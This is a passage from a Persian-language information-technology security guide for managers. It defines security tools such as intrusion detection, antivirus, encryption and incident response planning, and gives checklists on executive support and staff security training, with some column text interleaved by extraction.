ﻣﺤﻴﻂ ﻛﺎﺭ ﻧﻴﺴﺖ ﻳﺎ ﺑﺎ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﺼﻮﺏ ﻣﻐـﺎﻳﺮ ﺍﺳـﺖ
ﺗﺼﻔﻴﻪ ﺷﻮﺩ.
.۶
ﺳﻴﺴﺘﻢ ﻣﻬﺎﺟﻢﻳـﺎﺏ ) - (IDSﺍﻳـﻦ ﻳـﻚ ﺳﻴـﺴﺘﻢ
ﻣﺨﺘﺺ ﺷﻨﺎﺳـﺎﻳﻲ ﻧﻔﻮﺫﻫـﺎ ﻳـﺎ ﺗﻼﺷـﻬﺎﻱ ﻧﻔـﻮﺫ ﺍﺳـﺖ،
ﻧﻔﻮﺫﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﻭ ﻳﺎ ﺑﺎ ﻛﻤﻚ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﺒﺮﺓ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﻧﺠﺎﻡ ﺷﻮﻧﺪ .ﺍﻳـﻦ ﺳﻴـﺴﺘﻢ
ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ١٨٤ﻭ ﺳـﺎﻳﺮ ﺍﻃﻼﻋـﺎﺕ ﺷـﺒﻜﻪ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲ ﻛﻨﺪ .ﺭﻭﺷﻬﺎﻱ ﻧﻈﺎﺭﺕ ﺑﺴﺘﻪ ﺑﻪ ﻋﻮﺍﻣﻠﻲ ﭼـﻮﻥ ﺍﻧـﻮﺍﻉ
ﺣﻤﻼﺗﻲ ﻛﻪ ﺳﻴﺴﺘﻢ ﺑﺎﻳﺪ ﺑﺘﻮﺍﻧﺪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺁﻧﻬﺎ ﺩﻓﺎﻉ ﻛﻨﺪ،
ﻣﺒﺎﺩﻱ ﻧﻔﻮﺫ ،ﺍﻧﻮﺍﻉ ﺩﺍﺭﺍﺋﻴﻬﺎ ،ﻭ ﻣﻴـﺰﺍﻥ ﻧﮕﺮﺍﻧـﻲ ﺩﺭ ﻣـﻮﺭﺩ
ﻫﺮﻳﻚ ﺍﺯ ﺗﻬﺪﻳﺪﻫﺎ ،ﺑﺴﻴﺎﺭ ﻣﺘﻨﻮﻉ ﻫﺴﺘﻨﺪ.
.۷
ﻭﻳﺮﻭﺱﻳﺎﺑﻬـﺎ -ﻛﺮﻣﻬـﺎ ،ﺗﺮﺍﻭﺍﻫـﺎ ﻭ ﻭﻳﺮﻭﺳـﻬﺎ ﻫﻤـﻪ
ﺍﺑﺰﺍﺭﻫــﺎﻳﻲ ﺑــﺮﺍﻱ ﺍﻧﺠــﺎﻡ ﺣﻤــﻼﺕ ﻫــﺴﺘﻨﺪ .ﻭﻳــﺮﻭﺱ
ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺁﻟﻮﺩﻩ ﻛﺮﺩﻥ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ
ﺳﻴﺴﺘﻢ ،ﺧﻮﺩ ﺭﺍ ﺗﻮﺯﻳﻊ ﻛﻨﺪ .ﺗﺮﺍﻭﺍﻫﺎ ﺧﻮﺩ ﺭﺍ ﺗﻮﺯﻳﻊ ﻳـﺎ ﺑـﻪ
ﺳﺎﻳﺮ ﻓﺎﻳﻠﻬﺎ ﻣﺘﺼﻞ ﻧﻤﻲﻛﻨﻨﺪ .ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ
ﻣﺨﺮﺏ ﻭ ﺁﺳﻴﺐﺭﺳﺎﻥ ﺭﺍ ﻣﻲﻳﺎﺑﻨﺪ ﻭ ﺍﺯ ﻛﺎﺭ ﻣﻲﺍﻧﺪﺍﺯﻧﺪ.
.۸
ﺭﻣﺰﮔﺬﺍﺭﻱ -ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ
ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺩﺭﺣﺎﻝ ﺍﻧﺘﻘﺎﻝ ﻭ ﻳـﺎ ﺩﺭ ﻣﻌـﺮﺽ ﺳـﺮﻗﺖ )ﺍﺯ
ﺭﻭﻱ ﺭﺳﺎﻧﺔ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ؛ ﻣﺜ ﹰﻼ ﺭﺳﺎﻧﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻳﺎ ﺭﺍﻳﺎﻧﺔ ﻗﺎﺑﻞ ﺣﻤﻞ(
ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ.
.۹
ﺁﺯﻣﻮﻥ ﺁﺳـﻴﺐ ﭘـﺬﻳﺮﻱ -ﻣﻨﻈـﻮﺭ ﺍﺯ ﺍﻳـﻦ ﺁﺯﻣـﻮﻥ،
ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭﺑﺎﺭﺓ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣﻮﺟـﻮﺩ
ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺷﺒﻜﻪ ﻭ ﺑﻜـﺎﺭﮔﻴﺮﻱ ﺍﻳـﻦ ﺍﻃﻼﻋـﺎﺕ ﺟﻬـﺖ
ﻋﺒﻮﺭ ﺍﺯ ﻣﻮﺍﻧﻊ ﻣﻌﻤﻮﻝ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﻧﻬﺎﻳﺘﹰﺎ ﺩﺳﺘﺮﺳـﻲ
ﺑﻪ ﻣﻨﺎﺑﻊ ﻣﺨﺘﻠﻒ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺷﺒﻜﻪ ﺍﺳﺖ.
.۱۰ﺭﺍﻫﺒﺮﻱ ﺻﺤﻴﺢ ﺳﻴﺴﺘﻤﻬﺎ -ﺍﻳـﻦ ﻣـﻮﺭﺩ ﺑﺎﻳـﺪ ﺑـﺎ
ﺗﻬﻴﺔ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺧﻄﺎﻫﺎﻱ ﺭﺍﻳﺞ ﺭﺍﻫﺒﺮﻱ ﻛـﻪ ﻋﻤﻮﻣـﹰﺎ ﺩﺭ
ﻣﺆﺳﺴﺎﺕ ﻳﺎ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺎﻟﻲ ﺭﺥ ﻣﻲﺩﻫﺪ ﻭ ﻧﻴﺰ ﻓﻬﺮﺳﺘﻲ
ﺍﺯ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺗﻜﻤﻴﻞ ﮔﺮﺩﺩ.
.۱۱ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺪﻳﺮﻳﺖ ﺳﻴﺎﺳﺖ -ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﻳـﻚ
ﻝ ﺍﺟﺮﺍﻱ ﺻـﺤﻴﺢ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ
ﺑﺮﻧﺎﻣﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺑﻪ ﻛﻨﺘﺮ ﹺ
ﺭﻭﺍﻟﻬﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺗـﺪﻭﻳﻦ
ﺷﺪﻩﺍﻧﺪ ﺑﭙﺮﺩﺍﺯﺩ.
.۱۲ﻃﺮﺡ ﻭﺍﻛـﻨﺶ ﺑـﻪ ﺭﺧـﺪﺍﺩ ) ١٨٥(IRPﻭ ﺗـﺪﺍﻭﻡ
ﮐﺴﺐ ﻭ ﮐﺎﺭ ) - ١٨٦(BCPﺍﻳـﻦ ﺳـﻨﺪ ﺍﺻـﻠﻲﺗـﺮﻳﻦ
ﺳﻨﺪﻱ ﺍﺳﺖ ﻛﻪ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﺁﻥ ﻣﻲﮔﻮﻳـﺪ ﭼﮕﻮﻧـﻪ ﻳـﻚ
ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﻛﻨﺪ ،ﺑﻪ ﺁﻥ ﻭﺍﻛﻨﺶ ﻧﺸﺎﻥ
ﻣﻲﺩﻫﺪ ،ﻭ ﺁﺳﻴﺒﻬﺎﻱ ﺁﻧﺮﺍ ﺗﺮﻣﻴﻢ ﻣﻲﻧﻤﺎﻳﺪ .ﺩﺍﺷـﺘﻦ ﻳـﻚ
IRPﻭ ﺁﺯﻣــﺎﻳﺶ ﺩﻭﺭﻩﺍﻱ ﺁﻥ ﻳﻜــﻲ ﺍﺯ ﺍﺻــﻠﻲﺗــﺮﻳﻦ
ﺣﺮﺑﻪﻫﺎﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﺍﺳﺖ.
ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺟﺮﺍﻳﻲ
١٨٧
ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺩﺭ ﻓﺼﻠﻬﺎﻱ ﻗﺒﻞ ﺩﻳﺪﻳﻢ ﺁﮔﺎﻫﻲ ﺍﺯ ﻧﻜـﺎﺕ ﺍﻣﻨﻴﺘـﻲ
ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻣﺤﻴﻄﻲ ﻛﻪ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺩﺭ ﺁﻥ ﺑﻪ ﻧﺤﻮ ﺍﺣﺴﻦ ﻗﺎﺩﺭ ﺑﻪ
ﻫﻤﻜﺎﺭﻱ ﺟﻬﺖ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺳـﺎﺯﻣﺎﻥ ﺧـﻮﺩ ﺑﺎﺷـﻨﺪ ﻳـﻚ ﻧﻜﺘـﺔ
ﻛﻠﻴﺪﻱ ﺍﺳﺖ .ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺍﺯ ﻧﺤـﻮﺓ ﺑﺮﺧـﻮﺭﺩ ﻣـﺪﻳﺮﺍﻥ ﺑـﺎ ﻗﻮﺍﻋـﺪ
ﺍﻣﻨﻴﺘــﻲ ﻭ ﻣﻴــﺰﺍﻥ ﺳــﺮﻣﺎﻳﻪﮔــﺬﺍﺭﻱ ﺁﻧﻬــﺎ ﺩﺭ ﺣــﻮﺯﺓ ﺁﻣــﻮﺯﺵ ﻭ
ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﻣﻨﻴﺖ ﻭ ﺳﺎﻳﺮ ﺯﻣﻴﻨﻪﻫﺎﻱ ﻣﺮﺑﻮﻃﻪ ،ﺗﺄﺛﻴﺮ ﻣـﻲ ﭘﺬﻳﺮﻧـﺪ.
185 Incident Response Plan
186 Business Continuity Plan
184 Log Files
۱۸۷ﻣﻨﺒﻊ ،ITS :ﻓﺼﻞ ﺳﻮﻡ ،ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺟﺮﺍﻳﻲ ،ﺹ ۵۰
١٩٩
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺑﺮﺍﻱ ﻣﺴﺌﻮﻟﻴﻦ ﺍﺟﺮﺍﻳﻲ ﺷﺮﻛﺖ ﻛﻪ ﺍﺟـﺮﺍﻱ
ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺭﻫﺒﺮﻱ ﻣﻲﻛﻨﻨﺪ ﺗﻨﻈﻴﻢ ﺷﺪﻩ ﺍﺳﺖ.
ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻛﺎﺭﻛﻨﺎﻥ
ﺑﻤﻨﻈﻮﺭ ﺗﺮﻭﻳﺞ ﻓﺮﻫﻨﮓ ﺍﻣﻨﻴﺘﻲ ،ﻣﺪﻳﺮﺍﻥ ﺑﺎﻳﺪ:
•
ﺁﻳﺎ ﺍﺯ ﺳﻄﻮﺡ ﺑﺎﻻﻱ ﻣﺪﻳﺮﻳﺖ ﺗﺎ ﻛﺎﺭﻛﻨﺎﻥ ﺧﻂ ﺗﻮﻟﻴﺪ ﻳـﻚ
ﻣﺴﻴﺮ ﺍﺭﺗﺒﺎﻃﻲ ﻣﺸﺨﺺ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟
•
•
ﺗﺄﻛﻴﺪ ﻛﻨﻨﺪ ﻛﻪ ﺍﻣﻨﻴﺖ ﺩﺭ ﺗﻤﺎﻡ ﺳـﻄﻮﺡ ﺳـﺎﺯﻣﺎﻥ ﺑـﺴﻴﺎﺭ
ﻣﻬﻢ ﺍﺳﺖ.
ﺁﻳﺎ ﻫﻤﻪ ﻣـﻲﺩﺍﻧﻨـﺪ ﻛـﻪ ﺁﻥ ﻣـﺴﻴﺮ ﺍﺭﺗﺒـﺎﻃﻲ ﭼﻴـﺴﺖ ﻭ
ﻛﺠﺎﺳﺖ؟
•
•
ﺍﻓﺮﺍﺩ ﺭﺍ ﻧﺴﺒﺖ ﺑﻪ ﭘﺮﺳﻴﺪﻥ ﺳـﺆﺍﻝ ﺩﺭ ﺯﻣﻴﻨـﺔ ﻓﻨﺎﻭﺭﻳﻬـﺎ ﻭ
ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺗﺮﻏﻴﺐ ﻧﻤﺎﻳﻨﺪ.
ﺁﻳﺎ ﻣﺴﺌﻮﻟﻴﺖ ﺍﻣﻨﻴﺖ ﺻﺮﺍﺣﺘﹰﺎ ﺑﺮ ﻋﻬﺪﺓ ﻳﻜـﻲ ﺍﺯ ﻣـﺪﻳﺮﺍﻥ،
ﻼ ﻗﺎﺋﻢ ﻣﻘﺎﻡ ﻣﺪﻳﺮ ﻋﺎﻣﻞ ﺳﺎﺯﻣﺎﻥ ،ﻳﺎ ﻣﺪﻳﺮ ﺍﻣﻨﻴـﺖ ،ﻳـﺎ
ﻣﺜ ﹰ
ﻳﻜﻲ ﺩﻳﮕﺮ ﺍﺯ ﻣﺪﻳﺮﺍﻥ ﺳﺎﺯﻣﺎﻥ ﮔﺬﺍﺷﺘﻪ ﺷﺪﻩ ﺍﺳﺖ؟
•
•
ﺍﺯ ﻛﻠﻴﺔ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺨﻮﺍﻫﻨﺪ ﺩﺭ ﺍﻳﻦ ﺭﺍﺑﻄﻪ ﺑـﺴﻴﺎﺭ ﻫﻮﺷـﻴﺎﺭ
ﺑﺎﺷﻨﺪ ﻭ ﻫﺮﮔﻮﻧﻪ ﻓﻌﺎﻟﻴﺖ ﻏﻴﺮﻣﻌﻤﻮﻝ )ﺩﺭ ﻣﺤـﻴﻂ ﺍﺩﺍﺭﻩ ﻳـﺎ ﺩﺭ
ﺳﻄﺢ ﺷﺒﻜﻪ( ﺭﺍ ﮔﺰﺍﺭﺵ ﺩﻫﻨﺪ.
ﺁﻳﺎ ﻣﺪﻳﺮﻳﺖ ﺑﺎ ﺍﺭﺍﺋﻪ ﻭ ﺍﻋﻤـﺎﻝ ﺑﺮﻧﺎﻣـﺔ ﺍﻣﻨﻴﺘـﻲ ﺳـﺎﺯﻣﺎﻥ،
ﺗﻌﻬﺪ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺁﻥ ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﺍﺳﺖ؟
•
•
ﺁﻳﺎ ﺭﻭﻱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﻨﺎﺳﺐ ﺍﻧﺠﺎﻡ
ﺷﺪﻩ ﻭ ﺑﻮﺩﺟﺔ ﻣﺮﺑﻮﻃـﻪ ﻭﺍﻗﻌـﹰﺎ ﺑـﻪ ﺁﻥ ﺗﺨـﺼﻴﺺ ﻳﺎﻓﺘـﻪ
ﺍﺳﺖ؟
ﻣﺸﺨﺺ ﻛﻨﻨﺪ ﻛﻪ ﭼﻪ ﻛﺎﺭﻫﺎﻳﻲ ﺟﻬﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺮﻳﻢ
ﺧﺼﻮﺻﻲ ﻭ ﺍﻳﻤﻨﻲ ﻛﺎﺭﻛﻨﺎﻥ ﺻﻮﺭﺕ ﻣﻲ ﮔﻴـﺮﺩ ،ﻭ ﺑـﺮﺍﻱ
ﻫﻤﻪ ﺭﻭﺷﻦ ﻧﻤﺎﻳﻨﺪ ﻛﻪ ﻭﻓـﺎﺩﺍﺭﻱ ﺑـﻪ ﺳـﺎﺯﻣﺎﻥ ﺩﺭ ﺩﺭﺟـﺔ
ﺍﻭﻝ ﻗــﺮﺍﺭ ﺩﺍﺭﺩ ﻭ ﻧﻔﻮﺫﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﻋﻤــﺪﻱ ﻗﺎﺑــﻞ
ﭼﺸﻢﭘﻮﺷﻲ ﻧﻤﻲﺑﺎﺷﻨﺪ.
•
ﺁﻳﺎ ﻫﻤﺔ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺍﻫﻤﻴﺖ ﮔﺰﺍﺭﺵ ﻭ
ﺣﻞ ﺳﺮﻳﻊ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺩﺭﻙ ﻣﻲﻛﻨﻨﺪ؟
•
ﺁﻳﺎ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺁﮔﺎﻫﻴﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑﻌﻨـﻮﺍﻥ ﺑﺨـﺸﻲ ﺍﺯ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺟﺪﻳﺪ ﻫﻤـﺔ ﺳـﻄﻮﺡ
ﺍﺯ ﻛﺎﺭﻛﻨــﺎﻥ ﺧــﻂ ﺗﻮﻟﻴــﺪ ﮔﺮﻓﺘــﻪ ﺗــﺎ ﺳــﻄﻮﺡ ﺑــﺎﻻﻱﻣﺪﻳﺮﻳﺘﻲ -ﭘﺬﻳﺮﻓﺘﻪ ﺷﺪﻩ ﺍﺳﺖ؟
•
ﺁﻳﺎ ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺁﮔﺎﻫﻲ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺗﻤﺎﻡ ﺭﺩﻩﻫﺎ ﻧﺴﺒﺖ
ﺑﻪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺷـﺮﻛﺖ ﮔﺎﻣﻬـﺎﻱ
ﻻﺯﻡ ﺑﺮﺩﺍﺷﺘﻪ ﺷﺪﻩ ﺍﺳﺖ؟
•
ﺁﻳــﺎ ﻫﻨﮕــﺎﻡ ﺗــﺪﻭﻳﻦ ﺳﻴﺎﺳــﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﺑــﻪ
ﻭﺍﻗﻌﻴﺘﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻓﺮﻫﻨﮓ ﺷـﺮﻛﺖ )ﺭﻭﺍﺑـﻂ ﻣـﺪﻳﺮﺍﻥ ﻭ
ﻛﺎﺭﻣﻨﺪﺍﻥ( ﺗﻮﺟﻪ ﺷﺪﻩ ﺍﺳﺖ؟
•
ﺁﻳﺎ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻣﻲﺩﺍﻧﻨﺪ ﻛﻪ ﻫﻨﮕﺎﻡ ﺑﺮﺧـﻮﺭﺩ ﺑـﺎ ﻣـﺸﻜﻼﺕ
ﺍﻣﻨﻴﺘﻲ )ﻳﺎ ﺩﺭ ﺟﺎﻳﻲ ﻛﻪ ﻧﺴﺒﺖ ﺑﻪ ﻭﻇﺎﻳﻒ ﺧﻮﺩ ﺁﮔﺎﻩ ﻧﻴﺴﺘﻨﺪ( ﺑﺎﻳﺪ
ﺍﺯ ﭼﻪ ﻛﺴﻲ ﻛﻤﻚ ﺑﺨﻮﺍﻫﻨﺪ؟
•
ﺁﻳﺎ ﺑﺎﺯﺑﻴﻨﻲ ﻭ ﻣﻤﻴﺰﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ؟
ﻫﺮ ﺷﺶ ﻣﺎﻩ ﻳﻜﺒﺎﺭ؟ ﻫﺮ ﺳﺎﻝ ﻳﻜﺒﺎﺭ؟
ﻓﻬﺮﺳﺖ ﺯﻳﺮ ﺑﺎ ﻫﺪﻑ ﻛﻤﻚ ﺑﻪ ﻣﺪﻳﺮﺍﻥ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺗﺎ ﺑﺘﻮﺍﻧﻨـﺪ
ﻛﺎﺭﻛﻨﺎﻥ ﺭﺍ ﺑﺮﺍﻱ ﻫﻤﻜﺎﺭﻱ ﺩﺭ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺳـﺎﺯﻣﺎﻥ ﺁﻣـﻮﺯﺵ
ﺩﻫﻨﺪ:
ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺁﻣﻮﺯﺷﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ
١٨٨
•
ﺁﻳﺎ ﻫﻤﺔ ﻣﺪﻳﺮﺍﻥ ﺭﺩﻩﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺑﻪ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴـﺖ
ﺳﺎﺯﻣﺎﻧﻲ ﻣﺘﻌﻬﺪ ﻫﺴﺘﻨﺪ؟
•
ﺁﻳﺎ ﺑﺎ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺟﻬﺖ ﺁﻣﻮﺯﺷـﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ،ﺍﺯ ﺍﻳـﻦ
ﺗﻌﻬﺪ ﺣﻤﺎﻳﺖ ﻛﺮﺩﻩﺍﻧﺪ؟
•
ﺁﻳﺎ ﺁﻥ ﺑﺮﻧﺎﻣـﺔ ﺁﻣﻮﺯﺷـﻲ ﺷـﺎﻣﻞ ﺟﺰﺋﻴـﺎﺕ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﻭ
ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﻣﻨﻴﺖ ﻧﻴﺰ ﻣﻲﺑﺎﺷﺪ؟
•
ﺁﻳﺎ ﺑﺮﺍﻱ ﺁﻣﻮﺯﺵ ﺍﻣﻨﻴﺘﻲ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺗﻌﻴﻴﻦﺷﺪﻩﺍﻱ ﻭﺟﻮﺩ
ﺩﺍﺭﺩ؟
•
ﺁﻳﺎ ﺍﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻛﺎﻣﻞ ﻭ ﺑﻪﺭﻭﺯ ﻫﺴﺘﻨﺪ ﻭ ﺁﻳﺎ ﻛﺎﺭﻛﻨـﺎﻥ ﺍﺯ
ﺁﻧﻬﺎ ﺍﻃﻼﻉ ﺩﺍﺭﻧﺪ؟
۱۸۸ﻣﻨﺒﻊ ،ITS :ﻓﺼﻞ ﭘﻨﺠﻢ ،ﺁﻣﻮﺯﺵ ﺍﻣﻨﻴﺖ ،ﺹ ۸۱
ﺑﺨﺶ ﺳﻮﻡ
•
ﺁﻳﺎ ﺧﻼﺻﻪ ﻫﺎﻱ ﻣﺪﻳﺮﻳﺘﻲ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺗﻬﻴﻪ ﻣـﻲﺷـﻮﻧﺪ؟
ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ؟
•
ﺗﻮﺿﻴﺢ ﺩﻫﻨﺪ ﻛﻪ ﻋﻨﺎﺻﺮ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺘﻲ ﺧـﻮﺏ ﭼـﻪ
ﭼﻴﺰﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ.
٢٠٠
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
•
ﺁﻳــﺎ ﻫﻤــﺔ ﻛﺎﺭﻣﻨــﺪﺍﻥ )ﺍﺯ ﺟﻤﻠــﻪ ﻣــﺪﻳﺮﺍﻥ ﺍﺟﺮﺍﻳــﻲ( ﺩﺭﺑــﺎﺭﺓ
ﻣـﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺧـﻮﺩ ﺩﺭ ﻗﺒـﺎﻝ ﺷـﺮﻛﺖ ﺁﻣـﻮﺯﺵ
ﺩﻳﺪﻩﺍﻧﺪ؟
•
ﺁﻳﺎ ﭼﺎﺭﭼﻮﺑﻲ ﺑﺮﺍﻱ ﺗﻮﺳﻌﻪ ﻭ ﺗﺪﺍﻭﻡ ﺁﮔﺎﻫﻲ ﺍﻣﻨﻴﺘﻲ ﻭﺟـﻮﺩ
ﺩﺍﺭﺩ؟
ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺯﻳﺎﻥ
١٩٠
•
ﺁﻳﺎ ﺑﻪ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﺗﻼﺵ ﺑﺮﺍﻱ ﺣﻔﻆ ﺁﻥ ﻫﺴﺘﻴﺪ ﻭﺍﻗﻔﻴﺪ؟
•
ﺁﻳﺎ ﻣﺪﻳﺮﻳﺖ ﻧﻴﺰ ﺩﺭ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﺍﺕ ﺩﺧﻴﻞ ﺑﻮﺩﻩ ﺍﺳﺖ؟
•
ﺁﻳﺎ ﺳﻴﺎﺳﺘﻬﺎ ﺑﻪ ﻧﺜﺮ ﺭﻭﺍﻥ ﻧﻮﺷﺘﻪ ﺷﺪﻩﺍﻧﺪ ﻭ ﺑﺮﺍﺣﺘـﻲ ﻗﺎﺑـﻞ
ﺩﺭﻙ ﻫﺴﺘﻨﺪ؟
•
ﺩﺭ ﻓﺼﻠﻬﺎﻱ ﺩﻭﻡ ،ﺳﻮﻡ ،ﻭ ﭼﻬﺎﺭﻡ ،ﺗﻬﺪﻳـﺪﻫﺎﻱ ﺭﺍﻳـﺞ ﺍﻣﻨﻴﺘـﻲ ﺭﺍ
ﺑﺮﺭﺳﻲ ﻛﺮﺩﻳﻢ )ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ( ﻭ ﺭﻭﺷﻬﺎﻱ ﺗﺤﻠﻴـﻞ ﺧـﺴﺎﺭﺗﻬﺎ ﺭﺍ
ﺷﺮﺡ ﺩﺍﺩﻳﻢ ،ﻭ ﺩﺭ ﻓﺼﻠﻬﺎﻱ ﺑﻌﺪﻱ ﻧﻴﺰ ﺑﻪ ﺍﺭﺍﺋﻪ ﺭﺍﻫﺒﺮﺩﻫﺎﻳﻲ ﺑﺮﺍﻱ
ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ -ﻛﻪ ﺑﻪ ﺗﻘﻮﻳﺖ ﺳـﺎﺯﻣﺎﻥ ﺩﺭ
ﻣﻘﺎﺑﻞ ﺣﻤﻼﺕ ﻭ ﺧﺴﺎﺭﺍﺕ ﺍﺗﻔﺎﻗﻲ ﻣﻨﺠﺮ ﻣﻲﺷﻮﻧﺪ -ﭘـﺮﺩﺍﺧﺘﻴﻢ.
ﭼﻨﺎﻧﻜﻪ ﺩﺭ ﺁﻥ ﻣﺒﺎﺣﺚ ﺩﻳﺪﻳﻢ ،ﻃﺮﺡ ﻭﺍﻛﻨﺶ ﺷﺎﻣﻞ ﻓﻬﺮﺳـﺘﻲ ﺍﺯ
ﻧﺘﺎﻳﺞ ﺍﺭﺯﺷﻴﺎﺑﻲ ﻋﻤﻠﻲ ﺍﻣﻨﻴﺖ ﺩﺭ ﻣﻮﺭﺩ ﺩﺍﺭﺍﺋﻴﻬﺎ ﺍﺳﺖ ﻭ ﻃﻴﻔـﻲ ﺍﺯ
